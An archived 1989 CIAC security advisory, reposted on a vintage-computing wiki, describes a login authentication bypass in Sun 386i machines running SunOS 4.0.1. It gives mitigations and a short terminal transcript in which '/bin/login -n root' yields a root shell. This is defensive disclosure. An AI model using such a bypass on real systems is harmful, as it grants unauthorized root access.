Please consider a donation to the Higher Intellect project. See https://preterhuman.net/donate.php or the Donate to Higher Intellect page for more info.

Authentication bypass in Sun 386i machines

From Higher Intellect Vintage Wiki
Revision as of 13:36, 9 July 2020 by Netfreak (talk | contribs) (Created page with "<pre> ________________________________________________________________ THE COMPUTER INCIDENT ADVISORY CAPABILITY CIAC ADVISORY NOTICE _________________________...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search
________________________________________________________________
		THE COMPUTER INCIDENT ADVISORY CAPABILITY

 				CIAC

			ADVISORY    NOTICE
________________________________________________________________


                     COMPUTER SECURITY INFORMATION

  		 Authentication bypass in Sun 386i machines

The login program supplied by Sun for its 386i machines, version 4.0.1 of Sun 
OS (SOS), accepts the argument "-n" which bypasses authentication.  It was
apparently added in order to allow the Sun program "logintool" to do the
authentication and have login do the housekeeping.  This allows a user who
discovers the new argument to the login program to become a root user in 
several ways.  An example of one method is attached. 

A temporary solution is to disable logintool and patch the binary using 
the "strings" and "adb"method used last November.  Alternatively and more 
simly, log in a root and issue the command

			chmod 110 /bin/login

Example of login endrun:
---------------------------------------------------
Script started on Tue Apr 11 14:16:25 1989
myhost[1] whoami
oconnor
myhost[2] /bin/login -n root
Login incorrect
login: onceuponatime
No home directory specified in password file!  Logging in with home=/
# whoami
root
# who a i
myhost!onceupon ttyp2   Apr 11 14:17
# ^D myhost1[3] ^D
script done on Tue Apr 11 14:17:34 1989
---------------------------------------------------

Sun is presently working on a patch.  When it is available, CIAC will
inform you accordingly. 

For questions or additional information, please contact

                                 Gene Schultz
                                 CIAC Team Leader
                                 (415) 422-8193 or FTS 532-8193
                                 gschultz%[email protected]